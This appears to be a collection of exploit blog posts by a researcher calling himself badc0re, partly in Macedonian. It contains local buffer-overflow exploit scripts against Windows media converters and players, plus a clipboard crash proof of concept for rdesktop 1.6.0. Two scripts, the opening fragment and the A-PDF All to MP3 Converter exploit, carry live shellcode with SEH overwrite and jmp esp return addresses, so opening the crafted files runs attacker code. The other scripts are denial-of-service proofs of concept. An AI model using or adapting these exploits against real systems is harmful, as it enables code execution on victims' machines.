“\x31\x0d\x0a\x0d\x0a\x5b\x42\x75\x74\x74\x6f\x6e\x31\x5d\x0d\x0a”
“\x43\x6f\x6d\x6d\x61\x6e\x64\x54\x79\x70\x65\x3d\x31\x0d\x0a\x43”
“\x6f\x6d\x6d\x61\x6e\x64\x3d\x65\x78\x70\x6c\x6f\x72\x65\x72\x2e”
“\x65\x78\x65\x0d\x0a\x46\x6c\x79\x62\x79\x53\x6f\x75\x6e\x64\x3d”
“\x2e\x5c\x68\x6f\x76\x65\x72\x73\x65\x6c\x2e\x77\x61\x76\x0d\x0a”
“\x4c\x65\x66\x74\x3d\x38\x33\x0d\x0a\x54\x6f\x70\x3d\x31\x33\x0d”
“\x0a\x54\x65\x78\x74\x43\x6f\x6c\x6f\x72\x3d\x32\x35\x35\x2c\x30”
“\x2c\x30\x0d\x0a\x48\x69\x67\x68\x6c\x69\x67\x68\x74\x43\x6f\x6c”
“\x6f\x72\x3d\x32\x35\x35\x2c\x32\x35\x35\x2c\x30\x0d\x0a\x43\x61”
“\x70\x74\x69\x6f\x6e\x3d\x52\x75\x6e\x20\x57\x69\x6e\x64\x6f\x77”
“\x73\x20\x45\x78\x70\x6c\x6f\x72\x65\x72\x0d\x0a\x46\x6f\x6e\x74”
“\x53\x69\x7a\x65\x3d\x32\x34\x0d\x0a\x46\x6f\x6e\x74\x4e\x61\x6d”
“\x65\x3d”)
junk=”\x41″*32
junk1=”\x41″*92
nseh=”\xeb\x06\x90\x90″
seh=”\x62\xce\x86\x7c”#\x62\xce\x86\x7c pop pop ret
esp=”\x7b\x46\x86\x7c”#\x7b\x46\x86\x7c jmp esp
try:
f.write(head+junk+esp+junk1+nseh+seh+shell)
f.close()
print(“File created”)
except:
print(“File cannot be created”) 

rdesktop 1.6.0 Memory Corruption (Copy from clipboard) PoC


Link

#rdesktop 1.6.0 Memory Corruption (Copy from clipboard) PoC
#By Dame Jovanoski (badc0re)
#
# This is the result of a 262120-character string placed on the clipboard and pasted into the remote machine
# using rdesktop 1.6.0, tested on Ubuntu 9.10
#
# Use of this exploit: python rdeskop.py
#
# And next is shift-insert(or ctrl-v) for copy
#
# This is what you get:
#
#root@bt:~# rdesktop 192.168.204.133
#WARNING: Remote desktop does not support colour depth 24; falling back to 16
#*** glibc detected *** rdesktop: double free or corruption (fasttop): 0x083f3250 ***
#======= Backtrace: =========
#/lib/tls/i686/cmov/libc.so.6[0xb7a4d454]
##/lib/tls/i686/cmov/libc.so.6(cfree+0x96)[0xb7a4f4b6]
#/usr/lib/libX11.so.6(XFree+0x1d)[0xb7b74fdd]
#rdesktop[0x805f43f]
#rdesktop[0x805a2b6]
##rdesktop[0x80630ff]
#rdesktop[0x80636d8]
#rdesktop[0x8063848]
#rdesktop[0x8064013]
#rdesktop[0x806484b]
#rdesktop[0x80663e3]
#rdesktop[0x80672b9]
#rdesktop[0x8067dbc]
#rdesktop[0x804ec2a]
#/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe5)[0xb79f4685]
#rdesktop[0x804ca61]
#======= Memory map: ========
#08048000-0807c000 r-xp 00000000 03:01 114747     /usr/bin/rdesktop
#0807c000-0807d000 r–p 00034000 03:01 114747     /usr/bin/rdesktop
#0807d000-0807f000 rw-p 00035000 03:01 114747     /usr/bin/rdesktop
#0807f000-08418000 rw-p 00000000 00:00 0          [heap]
#b7500000-b7521000 rw-p 00000000 00:00 0
#b7521000-b7600000 —p 00000000 00:00 0
#b769b000-b771c000 rw-p 00000000 00:00 0
#b791d000-b7925000 r-xp 00000000 03:01 120953     /usr/lib/libXrender.so.1.3.0
#b7925000-b7926000 r–p 00007000 03:01 120953     /usr/lib/libXrender.so.1.3.0
#b7926000-b7927000 rw-p 00008000 03:01 120953     /usr/lib/libXrender.so.1.3.0
#b7927000-b792f000 r-xp 00000000 03:01 120903     /usr/lib/libXcursor.so.1.0.2
#b792f000-b7930000 rw-p 00007000 03:01 120903     /usr/lib/libXcursor.so.1.0.2
#b7933000-b7940000 r-xp 00000000 03:01 105519     /lib/libgcc_s.so.1
#b7940000-b7941000 r–p 0000c000 03:01 105519     /lib/libgcc_s.so.1
#b7941000-b7942000 rw-p 0000d000 03:01 105519     /lib/libgcc_s.so.1
#b7942000-b794c000 r-xp 00000000 03:01 122321     /lib/tls/i686/cmov/libnss_files-2.8.90.so
#b794c000-b794d000 r–p 00009000 03:01 122321     /lib/tls/i686/cmov/libnss_files-2.8.90.so
#b794d000-b794e000 rw-p 0000a000 03:01 122321     /lib/tls/i686/cmov/libnss_files-2.8.90.so
#b794e000-b7957000 r-xp 00000000 03:01 122325     /lib/tls/i686/cmov/libnss_nis-2.8.90.so
#b7957000-b7958000 r–p 00008000 03:01 122325     /lib/tls/i686/cmov/libnss_nis-2.8.90.so
#b7958000-b7959000 rw-p 00009000 03:01 122325     /lib/tls/i686/cmov/libnss_nis-2.8.90.so
#b7959000-b796e000 r-xp 00000000 03:01 122315     /lib/tls/i686/cmov/libnsl-2.8.90.so
#b796e000-b796f000 r–p 00014000 03:01 122315     /lib/tls/i686/cmov/libnsl-2.8.90.so
#b796f000-b7970000 rw-p 00015000 03:01 122315     /lib/tls/i686/cmov/libnsl-2.8.90.so
#b7970000-b7972000 rw-p 00000000 00:00 0
#b7972000-b7979000 r-xp 00000000 03:01 122317     /lib/tls/i686/cmov/libnss_compat-2.8.90.so
#b7979000-b797a000 r–p 00006000 03:01 122317     /lib/tls/i686/cmov/libnss_compat-2.8.90.so
#b797a000-b797b000 rw-p 00007000 03:01 122317     /lib/tls/i686/cmov/libnss_compat-2.8.90.so
#b797b000-b797c000 rw-p 00000000 00:00 0
#b797c000-b7980000 r-xp 00000000 03:01 120909     /usr/lib/libXdmcp.so.6.0.0
#b7980000-b7981000 rw-p 00003000 03:01 120909     /usr/lib/libXdmcp.so.6.0.0
#b7981000-b7982000 rw-p 00000000 00:00 0
#b7982000-b7984000 r-xp 00000000 03:01 120891     /usr/lib/libXau.so.6.0.0
#b7984000-b7985000 rw-p 00001000 03:01 120891     /usr/lib/libXau.so.6.0.0
#b7985000-b799c000 r-xp 00000000 03:01 215752     /usr/lib/libxcb.so.1.0.0
#b799c000-b799d000 r–p 00016000 03:01 215752     /usr/lib/libxcb.so.1.0.0
#b799d000-b799e000 rw-p 00017000 03:01 215752     /usr/lib/libxcb.so.1.0.0
#b799e000-b799f000 r-xp 00000000 03:01 215748     /usr/lib/libxcb-xlib.so.0.0.0
#b799f000-b79a0000 r–p 00000000 03:01 215748     /usr/lib/libxcb-xlib.so.0.0.0
#b79a0000-b79a1000 rw-p 00001000 03:01 215748     /usr/lib/libxcb-xlib.so.0.0.0
#b79a1000-b79a8000 r-xp 00000000 03:01 122334     /lib/tls/i686/cmov/librt-2.8.90.so
#b79a8000-b79a9000 r–p 00007000 03:01 122334     /lib/tls/i686/cmov/librt-2.8.90.so
#b79a9000-b79aa000 rw-p 00008000 03:01 122334     /lib/tls/i686/cmov/librt-2.8.90.so
#b79aa000-b79bf000 r-xp 00000000 03:01 122330     /lib/tls/i686/cmov/libpthread-2.8.90.so
#b79bf000-b79c0000 r–p 00014000 03:01 122330     /lib/tls/i686/cmov/libpthread-2.8.90.so
#b79c0000-b79c1000 rw-p 00015000 03:01 122330     /lib/tls/i686/cmov/libpthread-2.8.90.so
#b79c1000-b79c4000 rw-p 00000000 00:00 0
#b79c4000-b79d8000 r-xp 00000000 03:01 215832     /usr/lib/libz.so.1.2.3.3
#b79d8000-b79da000 rw-p 00013000 03:01 215832     /usr/lib/libz.so.1.2.3.3
#b79da000-b79dc000 r-xp 00000000 03:01 122310     /lib/tls/i686/cmov/libdl-2.8.90.so
#b79dc000-b79dd000 r–p 00001000 03:01 122310     /lib/tls/i686/cmov/libdl-2.8.90.Aborted

from struct import *
import time
import pygtk
pygtk.require(‘2.0’)
import gtk
import sys

# Crash proof of concept for the local rdesktop client: places a very long
# string on the desktop clipboard. The crash shown in the header (glibc
# "double free or corruption", with XFree in the backtrace) happens later,
# in rdesktop itself, when that clipboard content is pasted into the session.
# NOTE(review): the typographic quotes, the Python 2 print statements and the
# lost indentation under try/except come from the page rendering; as shown the
# listing is not valid Python.
print “Creating expoit.”
time.sleep(1)
print “Creating explot..”
time.sleep(1)
print “Creating explot…”
# 262120 repetitions of 0x41 ('A'): filler only, no payload.
buf=”\x41″*262120
try:
clipboard = gtk.clipboard_get()
# The current clipboard text is read here but never used afterwards.
text=clipboard.wait_for_text()
clipboard.set_text(buf)
# presumably store() hands the data to a clipboard manager so that it outlives this script (TODO confirm)
clipboard.store()
print “String is copied into clipboard.”
# Bare except: every failure in the GTK calls above produces the same message,
# and the underlying cause is lost.
except:
print “String cannot be copied into clipboard.”

Hanso Converter v1.1.0 Buffer Overflow – DoS (Language File .xml)


link

# Exploit Title: Hanso Converter v1.1.0 Language File Buffer Overflow – Denial OF Service
# Date: 05.02.2011
# Author: Dame Jovanoski(badc0re)
# Software Link: http://www.hansotools.com/downloads/hanso-converter-setup.exe
# Version: v1.1.0
# Tested on: XP sp3
# Type of exploit:local 

from struct import *
import time
# Denial-of-service proof of concept: replaces the language file app_fr.xml
# with 100 bytes of 0x41 ('A').
# NOTE(review): 100 'A' characters are not well-formed XML, so this listing
# cannot show whether the crash is a buffer overflow, as the title says, or an
# unhandled parse error. Confirm in a debugger before classifying it.
# NOTE(review): the typographic quotes, the Python 2 print statements and the
# lost indentation under try/except come from the page rendering; as shown the
# listing is not valid Python.
# NOTE(review): open() is outside the try block, so a failure to create the
# file raises before the "File cannot be created" branch can ever run.
f=open(“app_fr.xml”,”w”)
print “Creating expoit.”
time.sleep(1)
print “Creating explot..”
time.sleep(1)
print “Creating explot…”
# The whole file content: filler bytes only, no XML markup and no payload.
junk=”\x41″*100
try:
f.write(junk)
f.close()
print “File created”
# Bare except: any error from write() or close() is reduced to one message.
except:
print “File cannot be created”

Hanso Player 1.4.0.0 Buffer Overflow – DoS Skinfile default.ini


link

# Hanso Player 1.4.0.0 Buffer Overflow – DoS Skinfile default.ini
#(possible stack cookie check)
#By Dame Jovanoski(badc0re)
#
#
#
from struct import *
import time
f=open(“default.ini”,”w”)
#shell=(“\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61”
#       “\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13”
#       “\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f”
#       “\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b”
#       “\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30”
#       “\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72”
#       “\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd”
#       “\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e”
#       “\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52”
#       “\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56”);
# Denial-of-service proof of concept: writes an oversized skin file through f,
# the default.ini handle opened earlier in this script. The payload defined
# above is commented out, so only a section header and filler are written.
# The header's remark "(possible stack cookie check)" suggests the author saw
# the process stop without gaining control. That is the author's guess and is
# not verified by this listing.
# NOTE(review): the typographic quotes, the Python 2 print statements and the
# lost indentation under try/except come from the page rendering; as shown the
# listing is not valid Python.
print “Creating expoit.”
time.sleep(1)
print “Creating explot..”
time.sleep(1)
print “Creating explot…”
# 4418 bytes of 0x41 ('A') filler following the section header.
junk=”\x41″*4418
# These bytes are the ASCII text "[Hanso Player Skin]" followed by a line feed.
head=(“\x5B\x48\x61\x6E\x73\x6F\x20\x50”
“\x6C\x61\x79\x65\x72\x20\x53\x6B”
“\x69\x6E\x5D\x0A”)
try:
f.write(head+junk)
f.close()
print “File created”
# Bare except: any error from write() or close() is reduced to one message.
except:
print “File cannot be created”

IDS(Intrusion Detection System) – краток преглед на карактеристиките

 

Еден документ што го напишав во врска со овие системи за нивните карактеристики, архитектура,типови и принципот како работат.

http://rapidshare.com/files/446337144/IDS.pdf

 

A-PDF All to MP3 Converter v.1.1.0 Universal Local SEH Exploit Објаснување на функционалности


Back on track……Ме немаше некое време hhhh

Како за почеток една ремејк скрипта на http://www.exploit-db.com/exploits/15033/ што ќе ја објаснам за некое време за тоа како се креира BOF во Windows со SEH. За тоа подоцна…..

from struct import *
import time
f=open(“A-PDF All to MP3.wav”,”w”)
shell=(“\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61”
“\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13”
“\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f”
“\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b”
“\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30”
“\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72”
“\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd”
“\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e”
“\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52”
“\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56”);
print “Creating expoit.”
time.sleep(1)
print “Creating explot..”
time.sleep(1)
print “Creating explot…”
junk=”\x41″*4132
print “Your shellcode size is:”,len(shell)
nseh=”\xeb\x06\x90\x90″
seh=”\x75\x95\x00\x6d”#6d009575 POP ESI
try:
f.write(junk+nseh+seh+shell)
f.close()
print “File created”
except:
print “File cannot be created”